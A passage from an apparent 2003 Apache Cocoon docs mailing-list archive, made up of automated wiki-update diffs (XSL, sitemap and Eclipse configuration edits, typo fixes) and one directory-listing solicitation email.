KieranKirwan Thu Dec 11 18:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=KieranKirwan , version: 5 on Thu Dec 11 16:20:34 2003 by KieranKirwan - The following is an output from an interactive SVG generated by: - * querying a MySQL database (containing 300000 zone-to-zone traveltimes) - * coloring a basemap SVG using Javascript - - [{Image src='KieranKirwan/TRAVELTI.png' caption=' ' width='80%' style='align:left; font-size:110%; color:green;'}] + From [email protected] Fri Dec 12 02:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88474 invoked from network); 12 Dec 2003 02:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Dec 2003 02:00:13 -0000 Received: (qmail 42500 invoked by uid 500); 12 Dec 2003 01:59:56 -0000 Delivered-To: [email protected] Received: (qmail 42469 invoked by uid 500); 12 Dec 2003 01:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42458 invoked from network); 12 Dec 2003 01:59:56 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 12 Dec 2003 01:59:56 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBC203p30176 for <[email protected]>; Fri, 12 Dec 2003 03:00:03 +0100 Date: Fri, 12 Dec 2003 03:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Tutorials DeleteMe Fri Dec 12 03:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Tutorials , version: 61 on Fri Dec 12 02:07:21 2003 by Prasadpola Page: http://wiki.cocoondev.org/Wiki.jsp?page=DeleteMe , version: 32 on Fri Dec 12 02:01:25 2003 by DavidCrossley + * Attachments on [Jelle] (should be in Bugzilla) From [email protected] Fri Dec 12 03:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14864 invoked from network); 12 Dec 2003 03:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Dec 2003 03:00:16 -0000 Received: (qmail 72718 invoked by uid 500); 12 Dec 2003 02:59:59 -0000 Delivered-To: [email protected] Received: (qmail 72584 invoked by uid 500); 12 Dec 2003 02:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72573 invoked from network); 12 Dec 2003 02:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 12 Dec 2003 02:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBC305p30211 for <[email protected]>; Fri, 12 Dec 2003 04:00:06 +0100 Date: Fri, 12 Dec 2003 04:00:06 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Tutorials DeleteMe Fri Dec 12 04:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Tutorials , version: 61 on Fri Dec 12 02:07:21 2003 by Prasadpola Page: http://wiki.cocoondev.org/Wiki.jsp?page=DeleteMe , version: 32 on Fri Dec 12 02:01:25 2003 by DavidCrossley + * Attachments on [Jelle] (should be in Bugzilla) From [email protected] Fri Dec 12 05:00:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48562 invoked from network); 12 Dec 2003 05:00:18 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Dec 2003 05:00:18 -0000 Received: (qmail 32402 invoked by uid 500); 12 Dec 2003 04:59:57 -0000 Delivered-To: [email protected] Received: (qmail 32344 invoked by uid 500); 12 Dec 2003 04:59:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32333 invoked from network); 12 Dec 2003 04:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 12 Dec 2003 04:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBC506p30616 for <[email protected]>; Fri, 12 Dec 2003 06:00:06 +0100 Date: Fri, 12 Dec 2003 06:00:06 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] XSPRequest Fri Dec 12 06:00:06 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=XSPRequest , version: 4 on Fri Dec 12 04:30:36 2003 by 161.129.204.104 - See also: {{http://cocoon.apache.org/2.1/userdocs/xsp/request.html}} ? ^^ ^^ + See also: [http://cocoon.apache.org/2.1/userdocs/xsp/request.html] ? ^ ^ From [email protected] Fri Dec 12 08:00:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19035 invoked from network); 12 Dec 2003 08:00:18 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Dec 2003 08:00:18 -0000 Received: (qmail 58049 invoked by uid 500); 12 Dec 2003 07:59:55 -0000 Delivered-To: [email protected] Received: (qmail 57942 invoked by uid 500); 12 Dec 2003 07:59:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57930 invoked from network); 12 Dec 2003 07:59:53 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 12 Dec 2003 07:59:53 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBC804p30690 for <[email protected]>; Fri, 12 Dec 2003 09:00:05 +0100 Date: Fri, 12 Dec 2003 09:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] OpenOfficeGeneration RecipeXSPSendMailExample Fri Dec 12 09:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=OpenOfficeGeneration , version: 13 on Fri Dec 12 07:25:48 2003 by 161.129.204.104 - <!-- Uncomment this, and comment previous if you want to use html.oowriter.xsl insead of standard OO transformation + <!-- Uncomment this, and comment previous if you want to use html.oowriter.xsl instead of standard OO transformation ? + Page: http://wiki.cocoondev.org/Wiki.jsp?page=RecipeXSPSendMailExample , version: 6 on Fri Dec 12 07:54:12 2003 by 161.129.204.104 - create a folder under sampler and name it "sendmail" (for example) ? ^ + create a folder under samples and name it "sendmail" (for example) ? ^ From [email protected] Fri Dec 12 11:00:31 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41983 invoked from network); 12 Dec 2003 11:00:30 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Dec 2003 11:00:30 -0000 Received: (qmail 27779 invoked by uid 500); 12 Dec 2003 10:59:52 -0000 Delivered-To: [email protected] Received: (qmail 27721 invoked by uid 500); 12 Dec 2003 10:59:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27627 invoked from network); 12 Dec 2003 10:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 12 Dec 2003 10:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBCB04p30835 for <[email protected]>; Fri, 12 Dec 2003 12:00:04 +0100 Date: Fri, 12 Dec 2003 12:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WebDAVAuthentic LoadInEclipse Fri Dec 12 12:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WebDAVAuthentic , version: 7 on Fri Dec 12 10:38:48 2003 by StenAkselHeien + + The xsl:attribute elements have linebreak and whitespace added to look good on the wiki. + ==> Remove this in your editor before testing (xsl:attribute only on one line). - <xsl:attribute name="codebase">http://<xsl:value-of select="$serverName"/>:<xsl:value-of select="$serverPort"/><xsl:value-of select="substring-before($requestURI, $sitemapURI)"/>authentic/<THE_CODEBASE_CAB_FILE_NAME></xsl:attribute> + <xsl:attribute name="codebase"> + http://<xsl:value-of select="$serverName"/>:<xsl:value-of select="$serverPort"/> + <xsl:value-of select="substring-before($requestURI, $sitemapURI)"/> + authentic/<THE_CODEBASE_CAB_FILE_NAME></xsl:attribute> - <xsl:attribute name="value">http://<xsl:value-of select="$serverName"/>:<xsl:value-of select="$serverPort"/><xsl:value-of select="substring-before($requestURI, $sitemapURI)"/>raw/<xsl:value-of select="$file"/></xsl:attribute> + <xsl:attribute name="value"> + http://<xsl:value-of select="$serverName"/>:<xsl:value-of select="$serverPort"/> + <xsl:value-of select="substring-before($requestURI, $sitemapURI)"/> + raw/<xsl:value-of select="$file"/></xsl:attribute> - <xsl:attribute name="value">http://<xsl:value-of select="$serverName"/>:<xsl:value-of select="$serverPort"/><xsl:value-of select="substring-before($requestURI, $sitemapURI)"/>write/<xsl:value-of select="$file"/></xsl:attribute> + <xsl:attribute name="value"> + http://<xsl:value-of select="$serverName"/>:<xsl:value-of select="$serverPort"/> + <xsl:value-of select="substring-before($requestURI, $sitemapURI)"/> + write/<xsl:value-of select="$file"/> + </xsl:attribute> - <xsl:attribute name="value">http://<xsl:value-of select="$serverName"/>:<xsl:value-of select="$serverPort"/><xsl:value-of select="substring-before($requestURI, $sitemapURI)"/>authentic/content.sps</xsl:attribute> + <xsl:attribute name="value"> + http://<xsl:value-of select="$serverName"/>:<xsl:value-of select="$serverPort"/> + <xsl:value-of select="substring-before($requestURI, $sitemapURI)"/> + authentic/content.sps</xsl:attribute> - <xsl:attribute name="value">http://<xsl:value-of select="$serverName"/>:<xsl:value-of select="$serverPort"/><xsl:value-of select="substring-before($requestURI, $sitemapURI)"/>authentic/content.xsd</xsl:attribute> + <xsl:attribute name="value"> + http://<xsl:value-of select="$serverName"/>:<xsl:value-of select="$serverPort"/> + <xsl:value-of select="substring-before($requestURI, $sitemapURI)"/> + authentic/content.xsd</xsl:attribute> Page: http://wiki.cocoondev.org/Wiki.jsp?page=LoadInEclipse , version: 15 on Fri Dec 12 10:38:25 2003 by AndrewSavory + I use this setup: + * make sure ./tools/loader is on your eclipse classpath (it isn't by default) + * create an eclipse run configuration for Jetty Cocoon: + ** On configurations 'Main' tab use 'Loader' as the main class. + ** On the Arguments tab set: + *** Program arguments: "tools\jetty\conf\main.xml" + *** VM arguments: "-Djava.endorsed.dirs=./lib/endorsed" + "-Dwebapp=./build/webapp" + -Dorg.xml.sax.parser=org.apache.xerces.parsers.SAXParser + -Djetty.port=8888 -Djetty.admin.port=8889 "-Dhome=." + "-Dloader.jar.repositories=./tools/jetty/lib,./lib/endorsed" + -Dloader.main.class=org.mortbay.jetty.Server From [email protected] Fri Dec 12 19:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91624 invoked from network); 12 Dec 2003 19:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Dec 2003 19:00:09 -0000 Received: (qmail 61119 invoked by uid 500); 12 Dec 2003 19:00:00 -0000 Delivered-To: [email protected] Received: (qmail 61010 invoked by uid 500); 12 Dec 2003 19:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60990 invoked from network); 12 Dec 2003 18:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 12 Dec 2003 18:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBCJ02p31538 for <[email protected]>; Fri, 12 Dec 2003 20:00:03 +0100 Date: Fri, 12 Dec 2003 20:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Tutorials Fri Dec 12 20:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Tutorials , version: 62 on Fri Dec 12 18:32:50 2003 by Clement - __French__ + __Francais__ From [email protected] Fri Dec 12 20:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24005 invoked from network); 12 Dec 2003 20:00:12 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Dec 2003 20:00:12 -0000 Received: (qmail 94179 invoked by uid 500); 12 Dec 2003 20:00:01 -0000 Delivered-To: [email protected] Received: (qmail 94149 invoked by uid 500); 12 Dec 2003 20:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94103 invoked from network); 12 Dec 2003 20:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 12 Dec 2003 20:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBCK04p31566 for <[email protected]>; Fri, 12 Dec 2003 21:00:04 +0100 Date: Fri, 12 Dec 2003 21:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CocoonUserGroupSwitzerland Fri Dec 12 21:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupSwitzerland , version: 47 on Fri Dec 12 19:58:26 2003 by 161.129.204.104 + *[MarkusVaterlaus] From [email protected] Sat Dec 13 00:00:35 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14394 invoked from network); 13 Dec 2003 00:00:35 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 13 Dec 2003 00:00:35 -0000 Received: (qmail 49245 invoked by uid 500); 12 Dec 2003 23:59:58 -0000 Delivered-To: [email protected] Received: (qmail 49198 invoked by uid 500); 12 Dec 2003 23:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49105 invoked from network); 12 Dec 2003 23:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 12 Dec 2003 23:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBD003p31662 for <[email protected]>; Sat, 13 Dec 2003 01:00:04 +0100 Date: Sat, 13 Dec 2003 01:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CMS Sat Dec 13 01:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CMS , version: 15 on Sat Dec 13 00:04:33 2003 by 161.129.204.104 - \\ Commercial sytems would include Vignette Storyserver and Stellent From [email protected] Sat Dec 13 01:00:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27972 invoked from network); 13 Dec 2003 01:00:14 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 13 Dec 2003 01:00:14 -0000 Received: (qmail 96402 invoked by uid 500); 13 Dec 2003 00:59:58 -0000 Delivered-To: [email protected] Received: (qmail 96377 invoked by uid 500); 13 Dec 2003 00:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96359 invoked from network); 13 Dec 2003 00:59:58 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 13 Dec 2003 00:59:58 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBD104p31689 for <[email protected]>; Sat, 13 Dec 2003 02:00:05 +0100 Date: Sat, 13 Dec 2003 02:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] XMLFormXindice CMS Sat Dec 13 02:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=XMLFormXindice , version: 18 on Sat Dec 13 00:39:44 2003 by Vadim + + + + + + + + + + - {{{<map:transformer name="xmlform" src="org.apache.cocoon.transformation.XMLFormTransformer" - logger="xmlform"/>}}} + {{{<map:transformer name="xmlform" + src="org.apache.cocoon.transformation.XMLFormTransformer" + logger="xmlform"/>}}} - {{{<map:action logger="xmlform" name="ArtistAction" src="com.simbiosystems.cocoon.xmlform.xindice.howto.ArtistAction"/>}}} + {{{<map:action logger="xmlform" + name="ArtistAction" + src="com.simbiosystems.cocoon.xmlform.xindice.howto.ArtistAction"/>}}} + + + Page: http://wiki.cocoondev.org/Wiki.jsp?page=CMS , version: 15 on Sat Dec 13 00:04:33 2003 by 161.129.204.104 - \\ Commercial sytems would include Vignette Storyserver and Stellent From [email protected] Sat Dec 13 11:18:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76554 invoked from network); 13 Dec 2003 11:18:12 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 13 Dec 2003 11:18:12 -0000 Received: (qmail 6994 invoked by uid 500); 13 Dec 2003 11:17:45 -0000 Delivered-To: [email protected] Received: (qmail 6864 invoked by uid 500); 13 Dec 2003 11:17:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 83660 invoked from network); 13 Dec 2003 10:37:39 -0000 Message-ID: <26656712.1071309246370.JavaMail.jwu@atlas> Date: Sat, 13 Dec 2003 03:54:06 -0600 (CST) From: Ian Lenzen <[email protected]> To: [email protected] Subject: XML listing Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N We are editing the XML section of all.info and would like to include your web site: http://cocoon.apache.org/2.0/ The all.info search directory addresses the issue of site credibility. Web site producers are an integral part of all.info. As a site contact, your input is essential in helping our users better find and evaluate your website. To update or simply to verify your site's listing, please click this link to access your record: http://all.info/s?a=l&z=28c9k3kkna2d3703jyuwzc&x=docs%40cocoon.apache.org More information about all.info and examples of how producer data is displayed on our site is available at: http://www.all.info Thanks in advance. Ian Lenzen Editor, all.info Note: You may use the link below to indicate that you are NOT the proper site contact or to provide a corrected site contact: http://all.info/s?a=nl&z=28c9k3kkna2d3703jyuwzc&x=docs%40cocoon.apache.org If you have questions, please email: [email protected] From [email protected] Sat Dec 13 21:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40904 invoked from network); 13 Dec 2003 21:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 13 Dec 2003 21:00:11 -0000 Received: (qmail 45616 invoked by uid 500); 13 Dec 2003 20:59:59 -0000 Delivered-To: [email protected] Received: (qmail 45452 invoked by uid 500); 13 Dec 2003 20:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45441 invoked from network); 13 Dec 2003 20:59:58 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 13 Dec 2003 20:59:58 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBDL02p32526 for <[email protected]>; Sat, 13 Dec 2003 22:00:02 +0100 Date: Sat, 13 Dec 2003 22:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Logicsheet Sat Dec 13 22:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Logicsheet , version: 11 on Sat Dec 13 20:48:32 2003 by PhilippJ + !Development hint (pseudo protokol) + + In most tutorials the registration of a custom logicsheet (in cocoon.xconf) uses the __resource:__ pseudo protokol. + This requiere to restart the servelt container (e.g. Tomcat) after changing something. + + Like described on this german page [Cocoon Logicsheet Tutorial|http://www.oio.de/public/xml/logicsheet-tutorial.htm#N10063] + it is also possiible to use the __context:__ pseudo protokoll, so when you just creating a straight forward xslt-logicsheet, it will be evaluated on each http request. Much better for developement (don't no if any drawbacks in deployment) + + {{{ + <builtin-logicsheet> + <parameter name="prefix" value="mylogic"/> + <parameter name="uri" value="http://hostname/mylogic/1.0"/> + <!-- <parameter name="href" value="resource://mylogic/mylogic.xsl"/> --> + <parameter name="href" value="context://taglib/mylogic.xsl"/> + </builtin-logicsheet> + }}} + + so you can store your logicsheet at a place like COCOON_WEBAPP_HOME/taglib/mylogic.xsl + From [email protected] Sat Dec 13 23:00:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70389 invoked from network); 13 Dec 2003 23:00:14 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 13 Dec 2003 23:00:14 -0000 Received: (qmail 37266 invoked by uid 500); 13 Dec 2003 23:00:00 -0000 Delivered-To: [email protected] Received: (qmail 37210 invoked by uid 500); 13 Dec 2003 23:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37197 invoked from network); 13 Dec 2003 23:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 13 Dec 2003 23:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBDN05p32576 for <[email protected]>; Sun, 14 Dec 2003 00:00:05 +0100 Date: Sun, 14 Dec 2003 00:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] MarkLeicester CocoonUserGroupLondon Sun Dec 14 00:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=MarkLeicester , version: 4 on Sat Dec 13 22:51:53 2003 by 161.129.204.104 + + Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupLondon , version: 8 on Sat Dec 13 22:45:11 2003 by 161.129.204.104 + [Mark Leicester|MarkLeicester]\\ From [email protected] Sun Dec 14 21:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82456 invoked from network); 14 Dec 2003 21:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Dec 2003 21:00:09 -0000 Received: (qmail 22971 invoked by uid 500); 14 Dec 2003 20:59:58 -0000 Delivered-To: [email protected] Received: (qmail 22944 invoked by uid 500); 14 Dec 2003 20:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22933 invoked from network); 14 Dec 2003 20:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 14 Dec 2003 20:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBEL02p07795 for <[email protected]>; Sun, 14 Dec 2003 22:00:02 +0100 Date: Sun, 14 Dec 2003 22:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] BeginnerEssentials Sun Dec 14 22:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=BeginnerEssentials , version: 6 on Sun Dec 14 21:04:20 2003 by 161.129.204.104 + lengthy "to do" list for the cocoon developers. Until then, this should let you do it the old fashioned way. - Note that in the manifest file there is a large list of the cocoon libs. This is necessary for deployment as a packaged war on many application servers. Its recommended you just append your manifest entries to the file given. Anything not on the list above you can feel free to trash. This structure will leave you will all of the capability of cocoon but nothing being used. Its a point at which to start from. In the sitemap file, you can delete all the pipelines and action sets. Some actions pertaining to particular samples, such as the database actions for the employee sample, can also be removed. Read the sitemap file carefully. Don't be too distressed if you delete something an need it later, you can always refer back to the original distribution to recreate it. - - In the future there may be a skeletal distribution such as I have shown here. It is on the rather lengthy "to do" list for the cocoon developers. Until then, this should let you do it the old fashioned way. From [email protected] Sun Dec 14 22:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95456 invoked from network); 14 Dec 2003 22:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Dec 2003 22:00:10 -0000 Received: (qmail 64870 invoked by uid 500); 14 Dec 2003 21:59:57 -0000 Delivered-To: [email protected] Received: (qmail 64778 invoked by uid 500); 14 Dec 2003 21:59:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64767 invoked from network); 14 Dec 2003 21:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 14 Dec 2003 21:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBEM02p07822 for <[email protected]>; Sun, 14 Dec 2003 23:00:02 +0100 Date: Sun, 14 Dec 2003 23:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] BeginnerEssentials Sun Dec 14 23:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=BeginnerEssentials , version: 7 on Sun Dec 14 21:36:04 2003 by JoergHeinicke - lengthy "to do" list for the cocoon developers. Until then, this 